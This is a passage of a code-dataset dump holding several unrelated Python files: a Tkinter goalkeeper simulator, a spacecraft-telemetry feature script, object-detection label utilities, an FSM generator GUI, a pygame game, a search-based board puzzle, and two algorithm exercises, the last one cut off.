self.pausarNoGolLigado:\r\n import time\r\n folderName = time.localtime()\r\n save_path = os.path.abspath(\"\")\r\n os.system(f'mkdir {save_path}\\\\Screenshots\\\\{str(folderName[3])}-{str(folderName[4])}-{str(folderName[5])}')\r\n self.pathScreenshot = save_path + f'\\\\Screenshots\\\\{str(folderName[3])}-{str(folderName[4])}-{str(folderName[5])}'\r\n print('Pause on Goal Ligado')\r\n self.botaoPauseOnGoal['bg'] = '#72d119'\r\n self.botaoPauseOnGoal['text'] = 'Printscreen: On'\r\n else:\r\n print('Pause on Goal Desligado')\r\n self.botaoPauseOnGoal['bg'] = '#d32c2c'\r\n self.botaoPauseOnGoal['text'] = 'Printscreen: Off'\r\n\r\n def calibrar(self):\r\n ''' Vai receber os valores dos campos de calibração e calibrar as traves '''\r\n # Apresentar Tutorial\r\n global tutorial_verificacao\r\n if tutorial_verificacao:\r\n tutorial_verificacao = not tutorial_verificacao\r\n win32.MessageBeep(1)\r\n win32.MessageBox(0, tutorial, 'Tutorial Calibragem')\r\n try:\r\n self.xTotalGol = abs(int(self.xCalibrarTraveEsquerda.get())) + abs(int(self.xCalibrarTraveDireita.get()))\r\n self.yTotalGol = 450 - abs(int(self.yCalibrarTraveAltura.get()))\r\n except:\r\n win32.MessageBeep(1)\r\n win32.MessageBox(0, 'Error: Argumentos em falta...', 'Error')\r\n\r\n else:\r\n try:\r\n self.xTotalGol = abs(int(self.xCalibrarTraveEsquerda.get())) + abs(int(self.xCalibrarTraveDireita.get()))\r\n self.yTotalGol = 450 - abs(int(self.yCalibrarTraveAltura.get()))\r\n except:\r\n win32.MessageBeep(1)\r\n win32.MessageBox(0, 'Error: Argumentos em falta...', 'Error')\r\n\r\n def habilitarBola(self):\r\n \"\"\" Vai ligar a simulação em tempo real da bola, pelo checkbutton 'ball' \"\"\"\r\n self.bolaLigada = not self.bolaLigada\r\n if self.bolaLigada:\r\n self.xbola = 100*self.escala + ((int(self.xReal)*self.escala * 200*self.escala) / self.xTotalGol*self.escala) # 600 -> X total da webcam\r\n self.ybola = 200*self.escala - (int(self.yReal)*self.escala * 200*self.escala) / self.yTotalGol*self.escala # 450 -> Y total da webcam\r\n self.bolaSimulacao = self.canvas.create_oval(self.xbola - self.tamanhoBola,\r\n self.ybola - self.tamanhoBola,\r\n self.xbola + self.tamanhoBola,\r\n self.ybola + self.tamanhoBola,\r\n fill=self.corBola, tag='bola')\r\n else:\r\n self.canvas.delete('bola')\r\n\r\n def resetar(self):\r\n \"\"\" Função do botão reset: Descalibrar tudo, retornar tudo ao padrão \"\"\"\r\n\r\n self.rodando = False\r\n self.angulo = 90\r\n self.botaoOn['text'] = 'On'\r\n self.xTotalGol = 600\r\n self.yTotalGol = 450\r\n self.xReal, self.yReal, self.x, self.y, self.raio, self.raioDefesa = '0', '0', '0', '0', '0', 60\r\n self.canvas.delete('bola')\r\n self.desenhar()\r\n\r\n def comecar(self):\r\n \"\"\" Botao on: Vai dizer se o programa está rodando ou em pause, caso pause ele ira trava na ultima posicao \"\"\"\r\n\r\n self.rodando = not self.rodando\r\n if self.rodando:\r\n self.botaoOn['text'] = 'Pause'\r\n else:\r\n self.botaoOn['text'] = 'On'\r\n self.aplicar()\r\n\r\n def aplicar(self):\r\n \"\"\" Se o programa estiver rodando (def comecar) ele irá fazer o loop com todas as funções necessarias \"\"\"\r\n if self.rodando:\r\n self.update()\r\n self.desenhar()\r\n self.root.after(10, self.aplicar)\r\n\r\n def desenhar(self):\r\n \"\"\" Função que redesenha os itens com novas posições e novos dados, Aqui tmb será tirado o printscreen caso ativado \"\"\"\r\n\r\n self.canvas.itemconfig('goleiro', start=-(170 + (self.angulo + 1)), extent=-20)\r\n self.canvas.itemconfig('textoangulo', text='Goleiro: {}º'.format(self.angulo))\r\n self.canvas.itemconfig('xreal', text='xReal: {}'.format(self.xReal))\r\n self.canvas.itemconfig('yreal', text='yReal: {}'.format(self.yReal))\r\n self.canvas.itemconfig('x', text='x: {}'.format(self.x))\r\n self.canvas.itemconfig('y', text='y: {}'.format(self.y))\r\n self.canvas.itemconfig('raio', text='Raio: {}'.format(self.raio))\r\n #self.canvas.move('bola', self.xbola, self.ybola)\r\n if self.bolaLigada:\r\n global contPrints\r\n self.canvas.delete(self.bolaSimulacao)\r\n try:\r\n if self.raio > 0 and self.raio < self.raioDefesa and int(self.x) > 0 and int(self.y) > 0:\r\n \"\"\"Caso o raio seja menor do que o indicado, a bola ficara verde e será habilitada a defesa\"\"\"\r\n self.bolaSimulacao = self.canvas.create_oval(self.xbola - self.tamanhoBola,\r\n self.ybola - self.tamanhoBola,\r\n self.xbola + self.tamanhoBola,\r\n self.ybola + self.tamanhoBola, fill='green',\r\n tag='bola')\r\n print('Defender: {}'.format(self.angulo))\r\n\r\n if self.pausarNoGolLigado and self.yReal > -10:\r\n win32.MessageBeep(1)\r\n img = ImageGrab.grab()\r\n #img.show()\r\n try:\r\n #Getting path of the program\r\n img.save(\"{}\\\\goalPhoto{}.jpg\".format(self.pathScreenshot, contPrints))\r\n contPrints += 1\r\n\r\n except:\r\n win32.MessageBox(0, 'Caminho inválido', 'Erro Print')\r\n self.comecar()\r\n\r\n time.sleep(0.3)\r\n\r\n else:\r\n self.bolaSimulacao = self.canvas.create_oval(self.xbola - self.tamanhoBola,\r\n self.ybola - self.tamanhoBola,\r\n self.xbola + self.tamanhoBola,\r\n self.ybola + self.tamanhoBola, fill=self.corBola,\r\n tag='bola')\r\n except:\r\n pass\r\n\r\n def validarRaio(self):\r\n \"\"\" Função do botao do RAIO, que vai receber o novo raio de atuação \"\"\"\r\n self.raioDefesa = int(self.CamporaioDefesa.get())\r\n\r\n def update(self):\r\n \"\"\" Função que irá atualizar os dados para poder passar para a parte do redesenho, recebe os dados do banco shelve e passa para as outras funções \"\"\"\r\n\r\n try:\r\n banco = shelvE.open('dados.db')\r\n #Angulo Refined\r\n self.angulo = int(banco.get('angulo'))\r\n cinco = int(self.angulo / 5) #Devolve os angulos de 5 em cinco\r\n self.angulo = cinco * 5\r\n\r\n if self.angulo <= 5 and self.angulo > -20:\r\n self.angulo = 5\r\n elif self.angulo <= -170 or self.angulo > 175:\r\n self.angulo = 175\r\n elif self.angulo <= -20:\r\n self.angulo = 90\r\n\r\n self.xReal = banco.get('xreal')\r\n self.yReal = banco.get('yreal')\r\n self.x = banco.get('x')\r\n self.y = banco.get('y')\r\n self.raio = banco.get('raio')\r\n self.xbola = (100 + ((int(self.xReal) * 200) / self.xTotalGol))*self.escala\r\n self.ybola = (200 - ((int(self.yReal) * 200) / self.yTotalGol))*self.escala\r\n #print('angulo: {}'.format(self.angulo))\r\n\r\n if self.xReal != None and self.yReal != None and self.x != None and self.y != None and self.raio != None:\r\n self.xReal = int(self.xReal)\r\n self.yReal = int(self.yReal)\r\n self.x = int(self.x)\r\n self.y = int(self.y)\r\n self.raio = int(self.raio)\r\n else:\r\n #print('Refazendo update')\r\n self.update()\r\n except:\r\n pass\r\n finally:\r\n #time.sleep(0.1)\r\n try:\r\n banco.close()\r\n except:\r\n #print('Evitando erro nao fechamento do banco')\r\n pass\r\n\r\n def sendSerial(self):\r\n #TODO Implementação do envio de angulo para arduino.\r\n self.serialLigada = not self.serialLigada\r\n if self.serialLigada:\r\n print('Serial Ligada')\r\n else:\r\n print('Serial desativada')\r\n pass\r\n\r\nif __name__ == '__main__':\r\n App()\r\n\r\n\r\n\r\n","sub_path":"goalkeeper-simulator.py","file_name":"goalkeeper-simulator.py","file_ext":"py","file_size_in_byte":18891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"354526735","text":"\nimport sys\nimport os\nfrom datetime import datetime\n\nsys.path.append(\"../\")\nfrom utils.utils import *\n\nfolder = config.features_folder\nif not os.path.exists(folder):\n os.makedirs(folder)\n\n\n# Function to read a csv file and resample to hourly\ndef parse_dmop(filename):\n df = pd.read_csv(config.data_folder + '/' + filename)\n df = convert_time(df)\n df = df.set_index('ut_ms')\n return df\n\n\ndmop_train1 = parse_dmop('/train_set/context--2008-08-22_2010-07-10--dmop.csv')\ndmop_train2 = parse_dmop('/train_set/context--2010-07-10_2012-05-27--dmop.csv')\ndmop_train3 = parse_dmop('/train_set/context--2012-05-27_2014-04-14--dmop.csv')\n\ndmop_train = pd.concat([dmop_train1, dmop_train2, dmop_train3])\n\ndmop_test = parse_dmop('/test_set/context--2014-04-14_2016-03-01--dmop.csv')\n\ndmop_all = pd.concat([dmop_train, dmop_test])\n\n\n# Split numeric values and subsystem\ndmop_split_df= dmop_all.subsystem.str.split('.',expand=True).rename(columns={0:'description',1:\"param\"})\n# split the subsystem/command pattern\ndmop_split_df['subsystem'] = dmop_split_df.description.str[0:4]\ndmop_split_df['command'] = dmop_split_df.description.str[4:]\n\n#\n# ATMB - Subsystem\n# ----------------\n\n# Commands for atmb\nATMB_commands = dmop_split_df[(dmop_split_df.subsystem == \"ATMB\")].command.value_counts()\n\n# Extract the \"kelvins\" per event\nATMB_df_events = dmop_split_df[dmop_split_df['subsystem']=='ATMB']\nATMB_df_events.loc[:,'kelvins'] = ATMB_df_events.command.str[0:3].astype(int)\n\n# feature sampled by hour \nATMB_df_events.kelvins.resample('h').ffill().fillna(method='bfill').to_pickle(config.features_folder + \"ATMB_commands.pkl\")\nATMB_df_events.kelvins.resample('h').ffill().fillna(method='bfill').to_csv(config.features_folder + \"ATMB_commands.csv\")","sub_path":"src/features/feature_dmop_atmb_sub.py","file_name":"feature_dmop_atmb_sub.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"332688653","text":"import numpy as np\n\nfrom object_detection.utils.np_box_list import BoxList\nfrom object_detection.utils.np_box_list_ops import (\n prune_non_overlapping_boxes, clip_to_window, change_coordinate_frame,\n concatenate, scale, multi_class_non_max_suppression, _copy_extra_fields)\n\nfrom rv2.core.box import Box\nfrom rv2.core.labels import Labels\n\n\ndef geojson_to_labels(geojson, crs_transformer):\n \"\"\"Extract boxes and related info from GeoJSON file.\"\"\"\n features = geojson['features']\n boxes = []\n class_ids = []\n scores = []\n\n for feature in features:\n # Convert polygon to pixel coords and then convert to bounding box.\n polygon = feature['geometry']['coordinates'][0]\n polygon = [crs_transformer.web_to_pixel(p) for p in polygon]\n xmin, ymin = np.min(polygon, axis=0)\n xmax, ymax = np.max(polygon, axis=0)\n boxes.append(Box(ymin, xmin, ymax, xmax))\n\n properties = feature.get('properties', {})\n class_ids.append(properties.get('class_id', 1))\n scores.append(properties.get('score', 1.0))\n\n boxes = np.array([box.npbox_format() for box in boxes], dtype=float)\n class_ids = np.array(class_ids)\n scores = np.array(scores)\n labels = ObjectDetectionLabels(boxes, class_ids, scores=scores)\n return labels\n\n\ndef labels_to_geojson(labels, crs_transformer, class_map):\n boxes = labels.get_boxes()\n class_ids = labels.get_class_ids().tolist()\n scores = labels.get_scores().tolist()\n\n features = []\n for box_ind, box in enumerate(boxes):\n polygon = box.geojson_coordinates()\n polygon = [crs_transformer.pixel_to_web(p) for p in polygon]\n\n class_id = class_ids[box_ind]\n class_name = class_map.get_by_id(class_id).name\n score = scores[box_ind]\n\n feature = {\n 'type': 'Feature',\n 'geometry': {\n 'type': 'Polygon',\n 'coordinates': [polygon]\n },\n 'properties': {\n 'class_id': class_id,\n 'class_name': class_name,\n 'score': score\n }\n }\n features.append(feature)\n\n return {\n 'type': 'FeatureCollection',\n 'features': features\n }\n\n\ndef inverse_change_coordinate_frame(boxlist, window):\n scaled_boxlist = scale(boxlist, window.get_height(), window.get_width())\n npboxes = np.round(scaled_boxlist.get())\n npboxes += [window.ymin, window.xmin, window.ymin, window.xmin]\n boxlist_new = BoxList(npboxes)\n _copy_extra_fields(boxlist_new, boxlist)\n return boxlist_new\n\n\nclass ObjectDetectionLabels(Labels):\n def __init__(self, npboxes, class_ids, scores=None):\n self.boxlist = BoxList(npboxes)\n self.boxlist.add_field('classes', class_ids)\n if scores is not None:\n self.boxlist.add_field('scores', scores)\n\n @staticmethod\n def from_boxlist(boxlist):\n scores = boxlist.get_field('scores') \\\n if boxlist.has_field('scores') else None\n return ObjectDetectionLabels(\n boxlist.get(), boxlist.get_field('classes'), scores)\n\n @staticmethod\n def from_geojson(geojson, crs_transformer):\n return geojson_to_labels(geojson, crs_transformer)\n\n @staticmethod\n def make_empty():\n npboxes = np.empty((0, 4))\n labels = np.empty((0,))\n scores = np.empty((0,))\n return ObjectDetectionLabels(npboxes, labels, scores)\n\n def get_subset(self, window, ioa_thresh=1.0):\n window_npbox = window.npbox_format()\n window_boxlist = BoxList(np.expand_dims(window_npbox, axis=0))\n boxlist = prune_non_overlapping_boxes(\n self.boxlist, window_boxlist, minoverlap=ioa_thresh)\n boxlist = clip_to_window(boxlist, window_npbox)\n boxlist = change_coordinate_frame(boxlist, window_npbox)\n return ObjectDetectionLabels.from_boxlist(boxlist)\n\n def get_boxes(self):\n return [Box.from_npbox(npbox) for npbox in self.boxlist.get()]\n\n def get_coordinates(self):\n return self.boxlist.get_coordinates()\n\n def get_npboxes(self):\n return self.boxlist.get()\n\n def get_scores(self):\n if self.boxlist.has_field('scores'):\n return self.boxlist.get_field('scores')\n return None\n\n def get_class_ids(self):\n return self.boxlist.get_field('classes')\n\n def __len__(self):\n return self.boxlist.get().shape[0]\n\n def concatenate(self, window, labels):\n boxlist_new = concatenate([\n self.boxlist,\n inverse_change_coordinate_frame(labels.boxlist, window)])\n return ObjectDetectionLabels.from_boxlist(boxlist_new)\n\n def prune_duplicates(self, score_thresh, merge_thresh):\n max_output_size = 1000000\n boxlist_new = multi_class_non_max_suppression(\n self.boxlist, score_thresh, merge_thresh, max_output_size)\n # Add one because multi_class_nms outputs labels that start at zero\n # instead of one like in the rest of the system. This is a kludge.\n class_ids = boxlist_new.get_field('classes')\n class_ids += 1\n return ObjectDetectionLabels.from_boxlist(boxlist_new)\n\n def to_geojson(self, crs_transformer, class_map):\n return labels_to_geojson(self, crs_transformer, class_map)\n","sub_path":"src/rv2/labels/object_detection_labels.py","file_name":"object_detection_labels.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"469847351","text":"try:\n # for Python2\n from Tkinter import * ## notice capitalized T in Tkinter\nexcept ImportError:\n # for Python3\n from tkinter import *\n\nfrom FSM_class import *\n\nfrom os.path import expanduser\nhome = expanduser(\"~\")\n\ndef refresh(self,frame,inputs):\n\n # inputs = [\n # (\"Min number of bits\", \"vmin\", Entry, 1),\n # (\"Max number of bits\", \"vmax\", Entry, 3),\n # (\"Seed\", \"seed\", Entry, \"mySeed\"),\n # (\"Number of states\", \"states\", Entry, 5),\n # (\"Indeterminacy\", \"ind\", Scale, 0.0),\n # (\"Loops\", \"loops\", Scale, 0.0)\n # ]\n\n n = 2\n\n memo = []\n\n for text, value, f, default in inputs:\n label = Label(frame, text=text, bg=self.MAIN_COLOR)\n label.grid(row=n,column=3,sticky=E)\n memo.append(label)\n if f == Entry:\n if type(default) is int:\n self.results[value] = IntVar()\n else:\n self.results[value] = StringVar()\n t1 = f(frame, textvariable=self.results[value])\n t1.grid(row=n,column=4)\n if f == Scale:\n self.results[value] = IntVar()\n f(frame, orient=HORIZONTAL, sliderlength=20,variable=self.results[value], bg=self.MAIN_COLOR).grid(row=n,column=4)\n\n self.results[value].set(default)\n n += 1\n\n return memo\n\n\nclass App:\n\n def __init__(self,master):\n\n self.MAIN_COLOR = \"#ffffff\"\n self.SEC_COLOR = \"#fff\"\n\n self.frame = Frame(master, bg=self.MAIN_COLOR)\n self.frame.pack()\n\n try:\n self.input = self.input\n except AttributeError:\n self.input = [\n (\"Input (bits)\", \"vmin\", Entry, 1),\n (\"Output (bits)\", \"vmax\", Entry, 3),\n (\"Seed\", \"seed\", Entry, \"mySeed\"),\n (\"Number of states\", \"states\", Entry, 5),\n (\"Loops (%)\", \"loops\", Scale, 0.0),\n (\"Jumps (%)\", \"jumps\", Scale, 0.0)\n ]\n\n Label(\n self.frame, padx=10, pady=10 ,relief=RIDGE, text=\"FSpyChine\",\n justify=CENTER, fg=\"#00aa00\", background=self.SEC_COLOR).grid(row=0,columnspan=5)\n\n radios = [\n (\"Random\", 1),\n (\"Sequential\", 2),\n (\"Patterns\", 3)\n ]\n self.v = IntVar()\n self.v.set(1)\n n=2\n for text, value in radios:\n b = Radiobutton(self.frame, text=text, variable=self.v, value=value, command=self.radio_action, bg=self.MAIN_COLOR)\n b.grid(row=n, column=0, sticky=W)\n n += 1\n\n self.results = {}\n\n\n self.memo = refresh(self,self.frame,self.input)\n\n\n def exportKiss2():\n method_name = \"fsm_\" + str(self.v.get())\n method = getattr(self, method_name)\n return method()\n\n Label(self.frame, text=\"Path to export\", bg=self.MAIN_COLOR).grid(row=6,column=0,sticky=E)\n self.results[\"path\"] = StringVar()\n self.results[\"path\"].set(home)\n\n t1 = Entry(self.frame, textvariable=self.results[\"path\"])\n t1.grid(row=6,column=1)\n\n b1 = Button(master, text=\"Export kiss2\", command=exportKiss2)\n # b1.pack()\n b1.pack()\n\n def image():\n method_name = \"image_\" + str(self.v.get())\n method = getattr(self, method_name)\n return method()\n\n b2 = Button(master, text=\"Export image\", command=image)\n b2.pack()\n\n def getPatterns():\n method_name = \"getPatterns\"\n method = getattr(self, method_name)\n return method()\n\n b3 = Button(master, text=\"Get patterns\", command=getPatterns)\n b3.pack()\n self.n = 0\n\n def getPatterns(self):\n if self.v.get() == 3:\n\n r = self.results\n x = FSM(\n seed = r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n loops=r[\"loops\"].get())\n x.build(pattern)\n x.getPatterns(r[\"path\"].get())\n\n else:\n tkMessageBox.showinfo(\"This is not possible\", \"Sorry, but you must use this with a pattern FSM\")\n\n def radio_action(self):\n # method_name = \"fsm_\" + str(self.v.get())\n # method = getattr(self, method_name)\n # return method()\n if self.v.get() == 3:\n self.memo[1].config(text='Number of patterns')\n self.memo[3].config(text='Max pattern length')\n else :\n self.memo[1].config(text='Output (bits)')\n self.memo[3].config(text='Number of states')\n\n\n def fsm_1(self):\n\n r = self.results\n x = FSM(\n seed=r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n loops=r[\"loops\"].get())\n x.build(random)\n x.kiss2(r[\"path\"].get())\n\n def fsm_2(self):\n r = self.results\n x = FSM(\n seed = r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n jumps=r[\"jumps\"].get(),\n loops=r[\"loops\"].get())\n x.build(sequential)\n x.kiss2(r[\"path\"].get())\n\n def fsm_3(self):\n r = self.results\n x = FSM(\n seed = r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n loops=r[\"loops\"].get())\n x.build(pattern)\n x.kiss2(r[\"path\"].get())\n\n def image_1(self):\n r = self.results\n x = FSM(\n seed=r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n loops=r[\"loops\"].get())\n x.build(random)\n x.image(r[\"path\"].get())\n\n def image_2(self):\n r = self.results\n x = FSM(\n seed = r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n jumps=r[\"jumps\"].get(),\n loops=r[\"loops\"].get())\n x.build(sequential)\n x.image(r[\"path\"].get())\n\n def image_3(self):\n r = self.results\n x = FSM(\n seed = r[\"seed\"].get(),\n input=r[\"vmin\"].get(),\n output=r[\"vmax\"].get(),\n states=r[\"states\"].get(),\n loops=r[\"loops\"].get())\n x.build(pattern)\n x.image(r[\"path\"].get())\n\n\nroot = Tk()\nroot.geometry(\"650x350\")\nroot.title(\"FSpyChine -- Developed by Antonio Segura Cano\")\n\napp = App(root)\n\nroot.mainloop()","sub_path":"src/FSM_gui.py","file_name":"FSM_gui.py","file_ext":"py","file_size_in_byte":6652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"109598394","text":"import pygame, sys\nfrom pygame.locals import*\nfrom Person import *\nfrom Wall import *\nfrom Wall2 import *\nfrom Anvil import *\n\n# Creates a screen that is 800 x 600\npygame.init()\nscreen = pygame.display.set_mode((800, 600))\n\ndisplay_width = 800\ndisplay_height = 600\ngameDisplay = pygame.display.set_mode((display_width,display_height))\n\n# Every 100 milliseconds check if a key is still pressed down\n# Allows user to hold down the key to move\npygame.key.set_repeat(60, 60)\n\n# create a person at position (40,40)\nguy = Person(350, 550)\ntheWall = Wall(150, 150)\ntheWall2 = Wall2(0,150)\ntheAnvil = Anvil(50, 500)\n\n# A list that keeps track of the areas of screen that have changed\nchangedRecs = []\n\n# draw the starting screen\nWHITE = (0,90,40)\nblack = (0, 0, 0)\nscreen.fill(WHITE)\ntheWall.draw(screen)\ntheWall2.draw(screen)\ntheAnvil.draw(screen)\npygame.display.update()\n\ndef text_objects(text, font):\n textSurface = font.render(text, True, black)\n return textSurface, textSurface.get_rect()\n\ndef message_display(text):\n largeText = pygame.font.Font('freesansbold.ttf',115)\n TextSurf, TextRect = text_objects(text, largeText)\n TextRect.center = ((display_width/2),(display_height/2))\n gameDisplay.blit(TextSurf, TextRect)\n pygame.display.update()\n\nwhile True:\n # draw the scene\n screen.fill(WHITE)\n theWall.draw(screen)\n theWall2.draw(screen)\n theAnvil.draw(screen)\n guy.draw(screen)\n\n # adds the current position of guy to the areas that have been changed\n changedRecs.append(guy.getRec())\n\n # update only the changed areas of the screen\n pygame.display.update(changedRecs)\n\n # check all events\n for event in pygame.event.get():\n if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):\n pygame.quit()\n sys.exit()\n\n elif event.type == KEYDOWN:\n # add the old position of guy to the areas of guy that have been changed\n changedRecs.append(guy.getRec())\n # move according to the key pressed. If it hits the wall, move the opposite direction\n #if event.key == K_UP:\n # guy.moveUp()\n #if guy.collide(theWall):\n # guy.moveDown()\n\n #elif event.key == K_DOWN:\n # guy.moveDown()\n #if guy.collide(theWall):\n #guy.moveUp()\n\n if event.key == K_LEFT:\n guy.moveLeft()\n if guy.collide(theWall):\n guy = Person(750, 550)\n elif guy.collide(theWall2):\n guy.guy = Person(750, 550)\n\n elif event.key == K_RIGHT:\n guy.moveRight()\n if guy.collide(theWall):\n guy = Person(0, 550)\n elif guy.collide(theWall2):\n guy = Person(0, 550)\n\n if guy.collide(theAnvil):\n message_display('You Died')\n #endgame dont spoil\n\n\n#https://github.com/brendangregg/GuessingGame/blob/master/src/guess.bash\n","sub_path":"WallRunner.py","file_name":"WallRunner.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"566988177","text":"import search\nfrom search import (breadth_first_tree_search,\n breadth_first_search,\n depth_first_graph_search,\n iterative_deepening_search,\n depth_limited_search,\n recursive_best_first_search)\nfrom utils import (name, print_table)\n\n\nclass BoardProblem(search.Problem):\n # MOVES\n MOVE_RIGHT = {'id': 0, 'value': 1}\n MOVE_LEFT = {'id': 1, 'value': -1}\n JUMP_RIGHT = {'id': 2, 'value': 1}\n JUMP_LEFT = {'id': 3, 'value': -1}\n\n # THE STATE IS A STRING OF CHARACTERS\n # Each character represents a piece, it can be W, B or a space.\n state = \"\"\n\n # ACTIONS\n # Each action is represented by a tuple of two components:\n # - The piece that makes the action\n # - The move that the piece is making\n #\n # For example, the tuple (1,0) with the following state: \"WB BB\"\n # means that the black piece of the left has to move to its right.\n\n # The result function executes the given action to the current state\n # and returns the result of that action.\n def result(self, state, action):\n if action[1] in (self.MOVE_RIGHT, self.MOVE_LEFT):\n return self.move(state, action[0], action[1])\n elif action[1] in (self.JUMP_RIGHT, self.JUMP_LEFT):\n return self.jump(state, action[0], action[1])\n else:\n raise AttributeError\n\n # The move function moves the given piece to the given direction\n def move(self, state, piece, direction):\n char_list = list(state)\n char = char_list[piece]\n char_list[piece] = ' '\n char_list[piece + direction['value']] = char\n return ''.join(char_list)\n\n # The jump function makes the piece to jump to the given direction\n # getting the target between the old site and the new one and it\n # swaps its color.\n def jump(self, state, piece, direction):\n char_list = list(state)\n char = char_list[piece]\n char_list[piece] = ' '\n for i in (1, 2):\n char_list[piece + i * direction['value']] = char\n return ''.join(char_list)\n\n # The actions function returns all possible moves that all pieces\n # can make in the given state.\n def actions(self, state):\n char_list = list(state)\n actions = []\n # As the only possible moves are near the spaces, these will become\n # the guides for the possible actions, checking the possible moves of\n # the nearer pieces (-2,-1,+1,+2).\n last_space_index = 0\n for _ in range(char_list.count(' ')):\n space_index = char_list.index(' ', last_space_index)\n for near_position in [-2, -1, 1, 2]:\n for move in self.moves(state, space_index, near_position):\n actions.append(move)\n last_space_index = space_index\n return actions\n\n # The moves function returns all possible moves and jumps of a given piece\n # position relative to the space_index in the given state\n # It checks if the piece can move or jump to the space, if so, it returns\n # the move or jump as an action\n def moves(self, state, space_index, near_position):\n moves = []\n piece = space_index + near_position\n if piece in range(len(state)):\n if near_position == -2 and not self.is_last_black(state, piece, self.JUMP_RIGHT):\n # It's a jump from the left and it's not the same color\n moves.append((piece, self.JUMP_RIGHT)) # So we make the piece to jump to the right\n\n elif near_position == -1: # It's a move from the left\n moves.append((piece, self.MOVE_RIGHT)) # So we make the piece to move to the right\n\n elif near_position == 1: # It's a move from the right\n moves.append((piece, self.MOVE_LEFT)) # So we make the piece to move to the left\n\n elif near_position == 2 and not self.is_last_black(state, piece, self.JUMP_LEFT):\n # It's a jump from the right and it's not the same color\n moves.append((piece, self.JUMP_LEFT)) # So we make the piece to jump to the left\n return moves\n\n # The last_black function returns true if the piece that is jumped over is the last black piece in the board\n def is_last_black(self, state, piece, jump):\n return state.count(\"B\") == 1 and state[piece + jump['value']] == \"B\"\n\n # The value function returns the value of the current state\n def value(self, state):\n return state.count(self.goal['char'])\n\n # The goal_test function tests if the given state is a solution or it\n # has to still searching for it.\n def goal_test(self, state):\n return self.value(state) == self.goal['cant']\n\n # The path_cost function gets the cost of the action made from state1\n # to state2.\n def path_cost(self, c, state1, action, state2):\n return 1\n\n def h(self, node):\n return node.state.count(self.goal['h'])\n\n\nclass InstrumentedBoardProblem(search.InstrumentedProblem):\n moves = [\"moves right\", \"moves left\", \"jumps right\", \"jumps left\"]\n def __init__(self, problem):\n super().__init__(problem)\n self.final_solution = None\n\n def __repr__(self):\n repr_final_solution = \"\"\n for node in self.final_solution:\n repr_final_solution += \"Piece {} {}. \".format(node[0], self.moves[node[1]['id']])\n return '<{:4d}/{:4d}/{:4d}/{}/{}>'.format(self.succs, self.goal_tests,\n self.states, repr_final_solution, str(self.found))\n\n\ndef compare_searchers(problems, header,\n searchers=[breadth_first_tree_search,\n breadth_first_search,\n depth_first_graph_search,\n iterative_deepening_search,\n depth_limited_search,\n recursive_best_first_search]):\n def do(searcher, problem):\n p = InstrumentedBoardProblem(problem)\n solution = searcher(p)\n p.final_solution = solution.solution()\n return p\n table = [[name(s)] + [do(s, p) for p in problems] for s in searchers]\n print_table(table, header)","sub_path":"assignment1_classes.py","file_name":"assignment1_classes.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"602876483","text":"\" 99. Recover Binary Search Tree\"\n\"\"\"\nTwo elements of a binary search tree (BST) are swapped by mistake.\n\nRecover the tree without changing its structure.\n\nNote:\nA solution using O(n) space is pretty straight forward. Could you devise a constant space solution?\nSubscribe to see which companies asked this question\n\"\"\"\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n \"inOrder search\"\n def __init__(self):\n self.errA = None\n self.errB = None\n self.pre = None\n \n def recoverHelper(self,root):\n if root == None:\n return\n self.recoverHelper(root.left)\n if self.pre != None:\n if self.pre.val > root.val:\n if self.errA == None:\n self.errA = self.pre\n self.errB = root\n else:\n self.errB = root\n self.pre = root\n self.recoverHelper(root.right)\n return\n \n def recoverTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n if root == None: return\n self.recoverHelper(root)\n if self.errA != None and self.errB != None:\n self.errA.val, self.errB.val = self.errB.val, self.errA.val\n return\n","sub_path":"TreeBST/recoverBinarySearchTree.py","file_name":"recoverBinarySearchTree.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"390491175","text":"import collections\nfrom typing import Iterator, List\n\nfrom test_framework import generic_test\n\n\ndef examine_buildings_with_sunset(sequence: Iterator[int]) -> List[int]:\n # Keep all buildings that potentially have a view in a stack\n # Given a new building (west of all existing buildings), compare it with the top of the stack\n # If the new building is taller than the top of the stack building, then pop the top of the stack building\n # Do this until the top of the stack is taller, then push the new building onto the stack\n # Essentially, the stack is in an increasing order of height, from West to East\n # Finally, return the stack in reversed order (i.e., starting from the East (tallest))\n\n BuildingWithHeight = collections.namedtuple('BuildingWithHeight',\n ('idx', 'height'))\n\n candidates = []\n\n for idx, height in enumerate(sequence):\n while candidates and height >= candidates[-1].height:\n candidates.pop()\n candidates.append(BuildingWithHeight(idx, height))\n\n return [c.idx for c in reversed(candidates)]\n\n\ndef examine_buildings_with_sunset_wrapper(sequence):\n return examine_buildings_with_sunset(iter(sequence))\n\n\nif __name__ == '__main__':\n exit(\n 